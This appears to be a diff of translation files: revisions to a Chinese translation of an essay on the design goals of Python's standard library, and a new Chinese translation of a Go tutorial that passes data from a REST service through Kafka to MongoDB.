||||||
* 主要的处理单元是由一个 Python 文件组成的(或 Jupyter notebook !),而不是一个 Python 目录和元数据文件
|
* 主要的工作单元是由一个 Python 文件组成的(或 Jupyter notebook !),而不是一个 Python 和元数据文件的目录
|
||||||
* 没有任何形式的单独的构建步骤 —— 是_作为_一个脚本分发的,类似于分发一个单独的 shell 脚本的方法
|
* 没有任何形式的单独的构建步骤 —— 是_作为_一个脚本分发的,类似于分发一个独立的 shell 脚本的方式
|
||||||
* 没有单独的安装步骤(除了下载这个文件到一个合适的位置),除了在目标系统上要求预配置运行时环境
|
* 没有单独的安装步骤(除了下载这个文件到一个合适的位置),除了在目标系统上要求预配置运行时环境外
|
||||||
* 没有显式的规定依赖关系,除了最低的 Python 版本,或一个预期的运行环境声明。如果需要一个标准库以外的依赖项,他们会通过一个环境脚本去提供(无论是操作系统、数据分析平台、还是嵌入 Python 运行时的应用程序)
|
* 没有显式的规定依赖关系,除了最低的 Python 版本,或一个预期的运行环境声明。如果需要一个标准库以外的依赖项,他们会通过一个环境脚本去提供(无论是操作系统、数据分析平台、还是嵌入 Python 运行时的应用程序)
|
||||||
* 没有单独的测试套件,使用“通过你给定的输入,这个脚本是否给出了你期望的结果?” 这种方式来进行测试
|
* 没有单独的测试套件,使用“通过你给定的输入,这个脚本是否给出了你期望的结果?” 这种方式来进行测试
|
||||||
* 如果在执行前需要测试,它将以 “试运行” 和 “预览” 模式来向用户展示软件_将_怎样运行
|
* 如果在执行前需要测试,它将以 “试运行” 和 “预览” 模式来向用户展示软件_将_怎样运行
|
||||||
@ -80,79 +80,79 @@ Python 是为谁设计的?
|
|||||||
|
|
||||||
相比之下,使用 Python 作为一个应用程序开发语言的开发者特征包括:
|
相比之下,使用 Python 作为一个应用程序开发语言的开发者特征包括:
|
||||||
|
|
||||||
* 主要的工作单元是由 Python 的目录和元数据文件组成的,而不是单个 Python 文件
|
* 主要的工作单元是由 Python 和元数据文件组成的目录,而不是单个 Python 文件
|
||||||
* 在发布之前有一个单独的构建步骤去预处理应用程序,即使是把它的这些文件一起打包进一个 Python sdist、wheel 或 zipapp 文档
|
* 在发布之前有一个单独的构建步骤去预处理应用程序,哪怕是把它的这些文件一起打包进一个 Python sdist、wheel 或 zipapp 文档中
|
||||||
* 是否有独立的安装步骤去预处理将要使用的应用程序,取决于应用程序是如何打包的,和支持的目标环境
|
* 是否有独立的安装步骤去预处理将要使用的应用程序,取决于应用程序是如何打包的,和支持的目标环境
|
||||||
* 外部的依赖直接在项目目录中的一个元数据文件中表示(比如,`pyproject.toml`、`requirements.txt`、`Pipfile`),或作为生成的发行包的一部分(比如,`setup.py`、`flit.ini`)
|
* 外部的依赖明确表示为项目目录中的一个元数据文件中,要么是直接在项目的目录中(比如,`pyproject.toml`、`requirements.txt`、`Pipfile`),要么是作为生成的发行包的一部分(比如,`setup.py`、`flit.ini`)
|
||||||
* 存在一个独立的测试套件,或者作为一个 Python API 的一个测试单元、功能接口的集成测试、或者是两者的一个结合
|
* 存在一个独立的测试套件,或者作为一个 Python API 的一个单元测试,或者作为功能接口的集成测试,或者是两者的一个结合
|
||||||
* 静态分析工具的使用是在项目级配置的,作为测试管理的一部分,而不是依赖
|
* 静态分析工具的使用是在项目级配置的,并作为测试管理的一部分,而不是取决于环境
|
||||||
|
|
||||||
作为以上分类的一个结果,CPython 和标准库最终提供的主要用途是,在合适的 CPython 特性发布后 3 - 5 年,为教育和<ruby>临时<rt>ad hoc</rt></ruby>的 Python 脚本环境呈现的功能,定义重新分发的独立基准。
|
作为以上分类的一个结果,CPython 和标准库的主要用途是,在相应的 CPython 特性发布后,为教育和<ruby>临时<rt>ad hoc</rt></ruby>的 Python 脚本环境,最终提供的是定义重分发者假定功能的独立基准 3- 5 年。
|
||||||
|
|
||||||
对于<ruby>临时<rt>ad hoc</rt></ruby>脚本使用的情况,这个 3 - 5 年的延迟是由于新版本重分发给用户的延迟造成的,以及那些再分发版的用户花在修改他们的标准操作环境上的时间。
|
对于<ruby>临时<rt>ad hoc</rt></ruby>脚本使用的情况,这个 3 - 5 年的延迟是由于重分发者给用户制作新版本的延迟造成的,以及那些重分发版本的用户们花在修改他们的标准操作环境上的时间。
|
||||||
|
|
||||||
在教育环境中的情况,教育工作者需要一些时间去评估新特性,和决定是否将它们包含进提供给他们的学生的课程中。
|
在教育环境中的情况是,教育工作者需要一些时间去评估新特性,和决定是否将它们包含进提供给他们的学生的课程中。
|
||||||
|
|
||||||
### 这些相关问题的原因是什么?
|
### 这些相关问题的原因是什么?
|
||||||
|
|
||||||
这篇文章很大程序上是受 Twitter 上对 [我的这个评论][20] 的讨论鼓舞的,它援引了定义在 [PEP 411][21] 中<ruby>临时<rt>Provisional</rt></ruby> API 的情形,作为一个开源项目的例子,对用户发出事实上的邀请,请其作为共同开发者去积极参与设计和开发过程,而不是仅被动使用已准备好的最终设计。
|
这篇文章很大程度上是受 Twitter 上对 [我的这个评论][20] 的讨论鼓舞的,它援引了定义在 [PEP 411][21] 中<ruby>临时<rt>Provisional</rt></ruby> API 的情形,作为一个开源项目的例子,对用户发出事实上的邀请,请其作为共同开发者去积极参与设计和开发过程,而不是仅被动使用已准备好的最终设计。
|
||||||
|
|
||||||
这些回复包括一些在更高级别的库中支持的临时 API 的困难程度的一些沮丧表述,这些库没有临时状态的传递,以及因此而被限制为只有临时 API 的最新版本支持这些相关特性,而没有任何的早期迭代版本。
|
这些回复包括一些在更高级别的库中支持临时 API 的困难程度的一些沮丧性表述、没有这些库做临时状态的传递、以及因此而被限制为只有临时 API 的最新版本才支持这些相关特性,而不是任何早期版本的迭代。
|
||||||
|
|
||||||
我的 [主要反应][22] 是去建议,开源提供者应该努力加强他们需要的有限支持,以加强他们的维护工作的可持续性。这意味着,如果支持老版本的临时 API 是非常痛苦的,然后,只有项目开发人员自己需要时,或者,有人为此支付费用时,他们才会去提供支持。这类似于我的观点,志愿者提供的项目是否应该免费支持老的商业的长周期支持的 Python 版本,这对他们来说是非常麻烦的事,我[不认他们应该去做][23],正如我所期望的那样,大多数这样的需求都来自于管理差劲的、习以为常的惯性,而不是真正的需求(真正的需求,它应该去支付费用来解决问题)
|
我的 [主要回应][22] 是,建议开源提供者应该强制实施有限支持,通过这种强制的有限支持可以让个人的维护努力变得可持续。这意味着,如果对临时 API 的老版本提供迭代支持是非常痛苦的,到那时,只有在项目开发人员自己需要、或有人为此支付费用时,他们才会去提供支持。这与我的这个观点是类似的,那就是,志愿者提供的项目是否应该免费支持老的、商业性质的、长周期的 Python 版本,这对他们来说是非常麻烦的事,我[不认为他们应该去做][23],正如我所期望的那样,大多数这样的需求都来自于管理差劲的、习以为常的惯性,而不是真正的需求(真正的需求,应该去支付费用来解决问题)。
|
||||||
|
|
||||||
然而,我的[第二个反应][24]是,去认识到这一点,尽管多年来一直在讨论这个问题(比如,在上面链接中 2011 的一篇年的文章中,以及在 Python 3 问答的回答中 [在这里][25]、[这里][26]、和[这里][27],和在去年的 [Python 包生态系统][28]上的一篇文章中的一小部分),我从来没有真实尝试直接去解释过它对标准库设计过程中的影响。
|
而我的[第二个回应][24]是去实现这一点,尽管多年来一直在讨论这个问题(比如,在上面链接中最早在 2011 年的一篇的文章中,以及在 Python 3 问答的回复中的 [这里][25]、[这里][26]、和[这里][27],以及去年的这篇文章 [Python 包生态系统][28] 中也提到了一些),但我从来没有真实地尝试直接去解释它在标准库设计过程中的影响。
|
||||||
|
|
||||||
如果没有这些背景,设计过程中的一些方面,如临时 API 的介绍,或者是<ruby>受到不同的启发<rt>inspired-by-not-the-same-as</rt></ruby>的介绍,看起来似乎是很荒谬的,因为它们似乎是在试图标准化 API,而实际上并没有对 API 进行标准化。
|
如果没有这些背景,设计过程中的一部分,比如临时 API 的引入,或者是<ruby>受启发而不同于它<rt>inspired-by-not-the-same-as</rt></ruby>的引入,看起来似乎是完全没有意义的,因为他们看起来似乎是在尝试对 API 进行标准化,而实际上并没有。
|
||||||
|
|
||||||
### 适合进入 PyPI 规划的方面有哪些?
|
### 适合进入 PyPI 规划的方面有哪些?
|
||||||
|
|
||||||
提交给 python-ideas 或 python-dev 的_任何_建议的第一个门槛就是,清楚地回答这个问题,“为什么 PyPI 上的一个模块不够好?”。绝大多数的建议都在这一步失败了,但有几个常见的方面可以考虑:
|
提交给 python-ideas 或 python-dev 的_任何_建议所面临的第一个门槛就是清楚地回答这个问题:“为什么 PyPI 上的一个模块不够好?”。绝大多数的建议都在这一步失败了,为了通过这一步,这里有几个常见的话题:
|
||||||
|
|
||||||
* 大多数新手可能经常是从互联网上去 “复制粘贴” 错误的指导,而不是去下载一个合适的第三方库。(比如,这就是为什么存在 `secrets` 库的原因:它使得人们很少去使用 `random` 模块,因为安全敏感的原因,这是用于游戏和统计模拟的)
|
* 与其去下载一个合适的第三方库,新手一般可能更倾向于从互联网上 “复制粘贴” 错误的指导。(比如,这就是为什么存在 `secrets` 库的原因:它使得人们很少去使用 `random` 模块,由于安全敏感的原因,它预期用于游戏和统计模拟的)
|
||||||
* 这个模块是用于提供一个实现的参考,并去允许与其它的相互竞争的实现之间提供互操作性,而不是对所有人的所有事物都是必要的。(比如,`asyncio`、`wsgiref`、`unittest`、和 `logging` 全部都是这种情况)
|
* 这个模块是打算去提供一个实现的参考,并允许与其它的相互竞争的实现之间提供互操作性,而不是对所有人的所有事物都是必要的。(比如,`asyncio`、`wsgiref`、`unittest`、和 `logging` 全部都是这种情况)
|
||||||
* 这个模块是用于标准库的其它部分(比如,`enum` 就是这种情况,像`unittest`一样)
|
* 这个模块是预期用于标准库的其它部分(比如,`enum` 就是这种情况,像`unittest`一样)
|
||||||
* 这个模块是被设计去支持语言之外的一些语法(比如,`contextlib`、`asyncio` 和 `typing` 模块,就是这种情况)
|
* 这个模块是被设计去支持语言之外的一些语法(比如,`contextlib`、`asyncio` 和 `typing` 模块,就是这种情况)
|
||||||
* 这个模块只是普通的临时的脚本用途(比如,`pathlib` 和 `ipaddress` 就是这种情况)
|
* 这个模块只是普通的临时的脚本用途(比如,`pathlib` 和 `ipaddress` 就是这种情况)
|
||||||
* 这个模块被用于一个教育环境(比如,`statistics` 模块允许进行交互式地探索统计的概念,尽管你不会用它来做全部的统计分析)
|
* 这个模块被用于一个教育环境(比如,`statistics` 模块允许进行交互式地探索统计的概念,尽管你可能根本就不会用它来做全部的统计分析)
|
||||||
|
|
||||||
通过前面的 “PyPI 是不是明显不够好” 的检查,一个模块还不足以确保被接收到标准库中,但它已经足够转变问题为 “在接下来的几年中,你所推荐的要包含的库能否对一般的 Python 开发人员的经验有所改提升?”
|
通过前面的 “PyPI 是不是明显不够好” 的检查,一个模块还不足以确保被接收到标准库中,但它已经足以转变问题为 “在接下来的几年中,你所推荐的要包含的库能否对一般的入门级 Python 开发人员的经验有所提升?”
|
||||||
|
|
||||||
标准库中的 `ensurepip` 和 `venv` 模块的介绍也明确地告诉再分发者,我们期望的 Python 级别的打包和安装工具在任何平台的特定分发机制中都予以支持。
|
标准库中的 `ensurepip` 和 `venv` 模块的引入也明确地告诉再分发者,我们期望的 Python 级别的打包和安装工具在任何平台的特定分发机制中都予以支持。
|
||||||
|
|
||||||
### 当增加它到标准库中时,为什么一些 API 会被改变?
|
### 当添加它们到标准库中时,为什么一些 API 会被改变?
|
||||||
|
|
||||||
现在已经存在的第三方模块有时候会被批量地采用到标准库中,在其它情况下,实际上增加进行的是重新设计和重新实现的 API,只是它参照了现有 API 的用户体验,但是,根据另外的设计参考,删除或修改了一些细节,和附属于语言参考实现部分的权限。
|
现在已经存在的第三方模块有时候会被批量地采用到标准库中,在其它情况下,实际上添加的是吸收了用户对现有 API 体验之后,进行重新设计和重新实现的 API,但是,会根据另外的设计考虑和已经成为其中一部分的语言实现参考来进行一些删除或细节修改。
|
||||||
|
|
||||||
例如,不像第三方库的广受欢迎的前身 `path.py`,`pathlib` 并_没有_定义字符串子类,而是以独立的类型替代。作为解决文件互操作性问题的结果,定义了文件系统路径协议,它允许与文件系统路径一起使用的接口,去使用更大范围的对象。
|
例如,不像广受欢迎的第三方库的前身 `path.py`,`pathlib` 并_没有_定义字符串子类,而是以独立的类型替代。作为解决文件互操作性问题的结果,定义了文件系统路径协议,它允许使用文件系统路径的接口去使用更多的对象。
|
||||||
|
|
||||||
为 `ipaddress` 模块设计的 API 将地址和网络的定义,调整为显式的单独主机接口定义(IP 地址关联到特定的 IP 网络),是为教学 IP 地址概念而提供的一个最佳的教学工具,而最原始的 `ipaddr` 模块中,使用网络术语的方式不那么严格。
|
为了在“IP 地址” 这个概念的教学上提供一个更好的工具,为 `ipaddress` 模块设计的 API,将地址和网络的定义调整为显式的、独立定义的主机接口(IP 地址被关联到特定的 IP 网络),而最原始的 `ipaddr` 模块中,在网络术语的使用方式上不那么严格。
|
||||||
|
|
||||||
在其它情况下,标准库被构建为多种现有方法的一个综合,而且,还有可能依赖于定义现有库的 API 时所不存在的特性。对于 `asyncio` 和 `typing` 模块就有这些考虑因素,虽然后来对 `dataclasses` API 的考虑因素被放到了 PEP 557 (它可以被总结为 “像属性一样,但是使用变量注释作为字段声明”)。
|
另外的情况是,标准库将综合多种现有的方法的来构建,以及为早已存在的库定义 API 时,还有可能依靠不存在的语法特性。比如,`asyncio` 和 `typing` 模块就全部考虑了这些因素,虽然在 PEP 557 中正在考虑将后者所考虑的因素应用到 `dataclasses` API 上。(它可以被总结为 “像属性一样,但是使用可变注释作为字段声明”)。
|
||||||
|
|
||||||
这类改变的工作原理是,这类库不会消失,而且,它们的维护者经常并不关心与标准库相关的限制(特别是,相对缓慢的发行节奏)。在这种情况下,对于标准库版本的文档来说,使用 “See Also” 链接指向原始模块是很常见的,特别是,如果第三方版本提供了标准库模块中忽略的其他特性和灵活性时。
|
这类改变的原理是,这类库不会消失,并且它们的维护者对标准库维护相关的那些限制通常并不感兴趣(特别是,相对缓慢的发行节奏)。在这种情况下,在标准库文档的更新版本中,很常见的做法是使用 “See Also” 链接指向原始模块,尤其是在第三方版本提供了额外的特性以及标准库模块中忽略的那些特性时。
|
||||||
|
|
||||||
### 为什么一些 API 是以临时的形式被增加的?
|
### 为什么一些 API 是以临时的形式被添加的?
|
||||||
|
|
||||||
虽然 CPython 确实设置了 API 的弃用策略,但我们通常不希望在没有令人信服的理由的情况下去使用该策略(在其他项目试图与 Python 2.7 保持兼容性时,尤其如此)。
|
虽然 CPython 维护了 API 的弃用策略,但在没有正当理由的情况下,我们通常不会去使用该策略(在其他项目试图与 Python 2.7 保持兼容性时,尤其如此)。
|
||||||
|
|
||||||
然而,当增加一个受已有的第三方启发去设计的而不是去拷贝的新 API 时,在设计实践中,有些设计实践可能会出现问题,这比平常的风险要高。
|
然而在实践中,当添加这种受已有的第三方启发而不是直接精确拷贝第三方设计的新 API 时,所承担的风险要高于一些正常设计决定可能出现问题的风险。
|
||||||
|
|
||||||
当我们考虑这种改变的风险比平常要高,我们将相关的 API 标记为临时(`provisional`),表示保守的终端用户要避免完全依赖它们,并且,共享抽象层的开发者可能希望考虑,对他们准备支持的临时 API 的版本实施比平时更严格的限制。
|
当我们考虑这种改变的风险比平常要高,我们将相关的 API 标记为临时,表示保守的终端用户要避免完全依赖它们,而共享抽象层的开发者可能希望,对他们准备去支持的那个临时 API 的版本,考虑实施比平时更严格的限制。
|
||||||
|
|
||||||
### 为什么只有一些标准库 API 被升级?
|
### 为什么只有一些标准库 API 被升级?
|
||||||
|
|
||||||
这里简短的回答得到升级的主要 API 有哪些?:
|
这里简短的回答得到升级的主要 API 有哪些?:
|
||||||
|
|
||||||
* 不适合外部因素驱动的补充更新
|
* 不太可能有大量的外部因素干扰的附加更新
|
||||||
* 无论是临时脚本使用情况,还是为促进将来的多个第三方解决方案之间的互操作性,都有明显好处的
|
* 无论是对临时脚本使用案例还是对促进将来多个第三方解决方案之间的互操作性,都有明显好处的
|
||||||
* 对这方面感兴趣的人提交了一个可接受的建议
|
* 对这方面感兴趣的人提交了一个可接受的建议
|
||||||
|
|
||||||
如果一个用于应用程序开发的模块存在一个非常明显的限制,比如,`datetime`,如果重分发版通过替代一个现成的第三方模块有所改善,比如,`requests`,或者,如果标准库的发布节奏与所需要的包之间真的存在冲突,比如,`certifi`,那么,计划对标准库版本进行改变的因素将显著减少。
|
如果一个用于应用程序开发的模块存在一个非常明显的限制,比如,`datetime`,如果重分发者通过可供替代的第三方选择很容易地实现了改善,比如,`requests`,或者,如果标准库的发布节奏与所需要的包之间真的存在冲突,比如,`certifi`,那么,建议对标准库版本进行改变的因素将显著减少。
|
||||||
|
|
||||||
从本质上说,这和关于 PyPI 上面的问题是相反的:因为,PyPI 分发机制对增强应用程序开发人员的体验来说,通常_是_足够好的,这样的改进是有意义的,允许重分发者和平台提供者自行决定将哪些内容作为缺省提供的一部分。
|
从本质上说,这和上面的关于 PyPI 问题正好相反:因为,从应用程序开发人员体验改善的角度来说,PyPI 分发机制通常_是_足够好的,这种分发方式的改进是有意义的,允许重分发者和平台提供者自行决定将哪些内容作为他们缺省提供的一部分。
|
||||||
|
|
||||||
当改变后的能力假设在 3-5 年内缺省出现时被认为是有价值的,才会将这些改变进入到 CPython 和标准库中。
|
假设在 3-5 年时间内,缺省出现了被认为是改变带来的可感知的价值时,才会将这些改变纳入到 CPython 和标准库中。
|
||||||
|
|
||||||
### 标准库任何部分都有独立的版本吗?
|
### 标准库任何部分都有独立的版本吗?
|
||||||
|
|
||||||
@ -160,19 +160,19 @@ Python 是为谁设计的?
|
|||||||
|
|
||||||
最有可能的第一个候选者是 `distutils` 构建系统,因为切换到这种模式将允许构建系统在多个发行版本之间保持一致。
|
最有可能的第一个候选者是 `distutils` 构建系统,因为切换到这种模式将允许构建系统在多个发行版本之间保持一致。
|
||||||
|
|
||||||
这种处理方式的其它可能的候选者是 Tcl/Tk 图形捆绑和 IDLE 编辑器,它们已经被拆分,并且通过一些重分发程序转换成可选安装项。
|
这种处理方式的其它的可能候选者是 Tcl/Tk 图形捆绑和 IDLE 编辑器,它们已经被拆分,并且通过一些重分发程序转换成可选安装项。
|
||||||
|
|
||||||
### 这些注意事项为什么很重要?
|
### 这些注意事项为什么很重要?
|
||||||
|
|
||||||
从最本质上说,那些积极参与开源开发的人就是那些致力于开源应用程序和共享抽象层的人。
|
从本质上说,那些积极参与开源开发的人就是那些致力于开源应用程序和共享抽象层的人。
|
||||||
|
|
||||||
写一些临时脚本和为学生设计一些教学习题的人,通常不会认为他们是软件开发人员 —— 他们是教师、系统管理员、数据分析人员、金融工程师、流行病学家、物理学家、生物学家、商业分析师、动画师、架构设计师等等。
|
那些写一些临时脚本或为学生设计一些教学习题的人,通常不认为他们是软件开发人员 —— 他们是教师、系统管理员、数据分析人员、金融工程师、流行病学家、物理学家、生物学家、商业分析师、动画师、架构设计师等等。
|
||||||
|
|
||||||
当我们所有的担心是,语言是开发人员的经验时,那么,我们可以简单假设人们知道一些什么,他们使用的工具,所遵循的开发流程,以及构建和部署他们软件的方法。
|
对于一种语言,当我们全部的担心都是开发人员的经验时,那么我们就可以根据人们所知道的内容、他们使用的工具种类、他们所遵循的开发流程种类、构建和部署他们软件的方法等假定,来做大量的简化。
|
||||||
|
|
||||||
当一个应用程序运行时(runtime),_也_作为一个脚本引擎广为流行时,事情将变的更加复杂。在一个项目中去平衡两种需求,就会导致双方的不理解和怀疑,做任何一件事都将变得很困难。
|
当一个应用程序运行时(runtime),_也_作为一个脚本引擎广为流行时,事情将变得更加复杂。在同一个项目中去平衡两种受众的需求,就会导致双方的不理解和怀疑,做任何一件事都将变得很困难。
|
||||||
|
|
||||||
这篇文章不是为了说,我们在开发 CPython 过程中从来没有做出过不正确的决定 —— 它只是指出添加到 Python 标准库中的看上去很荒谬的特性的最合理的反应,它将是 “我不是那个特性的预期目标受众的一部分”,而不是 “我对它没有兴趣,因此,它对所有人都是毫无用处和没有价值的,添加它纯属骚扰我”。
|
这篇文章不是为了说,我们在开发 CPython 过程中从来没有做出过不正确的决定 —— 它只是去合理地回应那些对添加到 Python 标准库中的看上去很荒谬的特性的质疑,它将是 “我不是那个特性的预期目标受众的一部分”,而不是 “我对它没有兴趣,因此它对所有人都是毫无用处和没有价值的,添加它纯属骚扰我”。
|
||||||
|
|
||||||
--------------------------------------------------------------------------------
|
--------------------------------------------------------------------------------
|
||||||
|
|
||||||
|
@ -1,33 +1,33 @@
|
|||||||
Asynchronous Processing with Go using Kafka and MongoDB
|
使用 Kafka 和 MongoDB 进行 Go 异步处理
|
||||||
============================================================
|
============================================================
|
||||||
|
|
||||||
In my previous blog post ["My First Go Microservice using MongoDB and Docker Multi-Stage Builds"][9], I created a Go microservice sample which exposes a REST http endpoint and saves the data received from an HTTP POST to a MongoDB database.
|
在我前面的博客文章[“使用 MongoDB 和 Docker 多阶段构建我的第一个 Go 微服务”][9] 中,我创建了一个 Go 微服务示例,它暴露一个 REST 式的 http 端点,并将从 HTTP POST 中接收到的数据保存到 MongoDB 数据库。
|
||||||
|
|
||||||
In this example, I decoupled the saving of data to MongoDB and created another microservice to handle this. I also added Kafka to serve as the messaging layer so the microservices can work on its own concerns asynchronously.
|
在这个示例中,我将保存数据到 MongoDB 的部分解耦出来,并创建了另一个微服务去处理它。我还添加了 Kafka 作为消息层,这样各个微服务就可以异步地处理各自关心的事务了。
|
||||||
|
|
||||||
> In case you have time to watch, I recorded a walkthrough of this blog post in the [video below][1] :)
|
> 如果你有时间去看,我将这个博客文章的整个过程录制到 [这个视频中了][1] :)
|
||||||
|
|
||||||
Here is the high-level architecture of this simple asynchronous processing example wtih 2 microservices.
|
下面是这个使用了两个微服务的简单的异步处理示例的高级架构。
|
||||||
|
|
||||||
![rest-kafka-mongo-microservice-draw-io](https://www.melvinvivas.com/content/images/2018/04/rest-kafka-mongo-microservice-draw-io.jpg)
|
![rest-kafka-mongo-microservice-draw-io](https://www.melvinvivas.com/content/images/2018/04/rest-kafka-mongo-microservice-draw-io.jpg)
|
||||||
|
|
||||||
Microservice 1 - is a REST microservice which receives data from a /POST http call to it. After receiving the request, it retrieves the data from the http request and saves it to Kafka. After saving, it responds to the caller with the same data sent via /POST
|
微服务 1 —— 是一个 REST 式微服务,它从一个 /POST http 调用中接收数据。接收到请求之后,它从 http 请求中检索数据,并将它保存到 Kafka。保存之后,它用通过 /POST 发送来的相同数据响应调用者。
|
||||||
|
|
||||||
Microservice 2 - is a microservice which subscribes to a topic in Kafka where Microservice 1 saves the data. Once a message is consumed by the microservice, it then saves the data to MongoDB.
|
微服务 2 —— 是一个在 Kafka 中订阅一个主题的微服务,在这里就是微服务 1 保存的数据。一旦消息被微服务消费之后,它接着保存数据到 MongoDB 中。
|
||||||
|
|
||||||
Before you proceed, we need a few things to be able to run these microservices:
|
在你继续之前,我们需要能够去运行这些微服务的几件东西:
|
||||||
|
|
||||||
1. [Download Kafka][2] - I used version kafka_2.11-1.1.0
|
1. [下载 Kafka][2] —— 我使用的版本是 kafka_2.11-1.1.0
|
||||||
|
|
||||||
2. Install [librdkafka][3] - Unfortunately, this library should be present in the target system
|
2. 安装 [librdkafka][3] —— 不幸的是,这个库需要预先安装在目标系统中
|
||||||
|
|
||||||
3. Install the [Kafka Go Client by Confluent][4]
|
3. 安装 [Confluent 的 Kafka Go 客户端][4]
|
||||||
|
|
||||||
4. Run MongoDB. You can check my [previous blog post][5] about this where I used a MongoDB docker image.
|
4. 运行 MongoDB。你可以去看我的 [以前的文章][5] 中关于这一块的内容,那篇文章中我使用了一个 MongoDB docker 镜像。
|
||||||
|
|
||||||
Let's get rolling!
|
我们开始吧!
|
||||||
|
|
||||||
Start Kafka first, you need Zookeeper running before you run the Kafka server. Here's how
|
首先,启动 Kafka,在你运行 Kafka 服务器之前,你需要运行 Zookeeper。下面是示例:
|
||||||
|
|
||||||
```
|
```
|
||||||
$ cd /<download path>/kafka_2.11-1.1.0
|
$ cd /<download path>/kafka_2.11-1.1.0
|
||||||
@ -35,14 +35,14 @@ $ bin/zookeeper-server-start.sh config/zookeeper.properties
|
|||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
Then run Kafka - I am using port 9092 to connect to Kafka. If you need to change the port, just configure it in config/server.properties. If you are just a beginner like me, I suggest to just use default ports for now.
|
接着运行 Kafka —— 我使用 9092 端口连接到 Kafka。如果你需要改变端口,只需要在 `config/server.properties` 中配置即可。如果你像我一样是个新手,我建议你现在还是使用默认端口。
|
||||||
|
|
||||||
```
|
```
|
||||||
$ bin/kafka-server-start.sh config/server.properties
|
$ bin/kafka-server-start.sh config/server.properties
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
After running Kafka, we need MongoDB. To make it simple, just use this docker-compose.yml.
|
Kafka 跑起来之后,我们需要 MongoDB。为简单起见,只需要使用这个 `docker-compose.yml` 即可。
|
||||||
|
|
||||||
```
|
```
|
||||||
version: '3'
|
version: '3'
|
||||||
@ -64,14 +64,14 @@ networks:
|
|||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
Run the MongoDB docker container using Docker Compose
|
使用 Docker Compose 去运行 MongoDB docker 容器。
|
||||||
|
|
||||||
```
|
```
|
||||||
docker-compose up
|
docker-compose up
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
Here is the relevant code of Microservice 1. I just modified my previous example to save to Kafka rather than MongoDB.
|
这里是微服务 1 的相关代码。我只是修改了我前面的示例去保存到 Kafka 而不是 MongoDB。
|
||||||
|
|
||||||
[rest-to-kafka/rest-kafka-sample.go][10]
|
[rest-to-kafka/rest-kafka-sample.go][10]
|
||||||
|
|
||||||
@ -136,7 +136,7 @@ func saveJobToKafka(job Job) {
|
|||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
Here is the code of Microservice 2. What is important in this code is the consumption from Kafka, the saving part I already discussed in my previous blog post. Here are the important parts of the code which consumes the data from Kafka.
|
这里是微服务 2 的代码。这段代码中最重要的部分是从 Kafka 中消费数据;保存部分我已经在前面的博客文章中讨论过了。下面是从 Kafka 中消费数据的重点代码。
|
||||||
|
|
||||||
[kafka-to-mongo/kafka-mongo-sample.go][11]
|
[kafka-to-mongo/kafka-mongo-sample.go][11]
|
||||||
|
|
||||||
@ -209,51 +209,51 @@ func saveJobToMongo(jobString string) {
|
|||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
Let's get down to the demo, run Microservice 1\. Make sure Kafka is running.
|
我们来演示一下,运行微服务 1。确保 Kafka 已经运行了。
|
||||||
|
|
||||||
```
|
```
|
||||||
$ go run rest-kafka-sample.go
|
$ go run rest-kafka-sample.go
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
I used Postman to send data to Microservice 1
|
我使用 Postman 向微服务 1 发送数据。
|
||||||
|
|
||||||
![Screenshot-2018-04-29-22.20.33](https://www.melvinvivas.com/content/images/2018/04/Screenshot-2018-04-29-22.20.33.png)
|
![Screenshot-2018-04-29-22.20.33](https://www.melvinvivas.com/content/images/2018/04/Screenshot-2018-04-29-22.20.33.png)
|
||||||
|
|
||||||
Here is the log you will see in Microservice 1\. Once you see this, it means data has been received from Postman and saved to Kafka
|
这里是日志,你可以在微服务 1 中看到。当你看到这些的时候,说明已经接收到了来自 Postman 发送的数据,并且已经保存到了 Kafka。
|
||||||
|
|
||||||
![Screenshot-2018-04-29-22.22.00](https://www.melvinvivas.com/content/images/2018/04/Screenshot-2018-04-29-22.22.00.png)
|
![Screenshot-2018-04-29-22.22.00](https://www.melvinvivas.com/content/images/2018/04/Screenshot-2018-04-29-22.22.00.png)
|
||||||
|
|
||||||
Since we are not running Microservice 2 yet, the data saved by Microservice 1 will just be in Kafka. Let's consume it and save to MongoDB by running Microservice 2.
|
因为我们尚未运行微服务 2,微服务 1 保存的数据将只存在于 Kafka 中。我们通过运行微服务 2 来消费它并将它保存到 MongoDB。
|
||||||
|
|
||||||
```
|
```
|
||||||
$ go run kafka-mongo-sample.go
|
$ go run kafka-mongo-sample.go
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
Now you'll see that Microservice 2 consumes the data and saves it to MongoDB
|
现在,你将看到微服务 2 消费了数据,并将它保存到了 MongoDB。
|
||||||
|
|
||||||
![Screenshot-2018-04-29-22.24.15](https://www.melvinvivas.com/content/images/2018/04/Screenshot-2018-04-29-22.24.15.png)
|
![Screenshot-2018-04-29-22.24.15](https://www.melvinvivas.com/content/images/2018/04/Screenshot-2018-04-29-22.24.15.png)
|
||||||
|
|
||||||
Check if data is saved in MongoDB. If it is there, we're good!
|
检查一下数据是否保存到了 MongoDB。如果有数据,我们成功了!
|
||||||
|
|
||||||
![Screenshot-2018-04-29-22.26.39](https://www.melvinvivas.com/content/images/2018/04/Screenshot-2018-04-29-22.26.39.png)
|
![Screenshot-2018-04-29-22.26.39](https://www.melvinvivas.com/content/images/2018/04/Screenshot-2018-04-29-22.26.39.png)
|
||||||
|
|
||||||
Complete source code can be found here
|
完整的源代码可以在这里找到
|
||||||
[https://github.com/donvito/learngo/tree/master/rest-kafka-mongo-microservice][12]
|
[https://github.com/donvito/learngo/tree/master/rest-kafka-mongo-microservice][12]
|
||||||
|
|
||||||
Shameless plug! If you like this blog post, please follow me in Twitter [@donvito][6]. I tweet about Docker, Kubernetes, GoLang, Cloud, DevOps, Agile and Startups. Would love to connect in [GitHub][7] and [LinkedIn][8]
|
现在是广告时间:如果你喜欢这篇文章,请在 Twitter [@donvito][6] 上关注我。我的 Twitter 上有关于 Docker、Kubernetes、GoLang、Cloud、DevOps、Agile 和 Startups 的内容。欢迎你们在 [GitHub][7] 和 [LinkedIn][8] 关注我。
|
||||||
|
|
||||||
[VIDEO](https://youtu.be/xa0Yia1jdu8)
|
[视频](https://youtu.be/xa0Yia1jdu8)
|
||||||
|
|
||||||
Enjoy!
|
开心地玩吧!
|
||||||
|
|
||||||
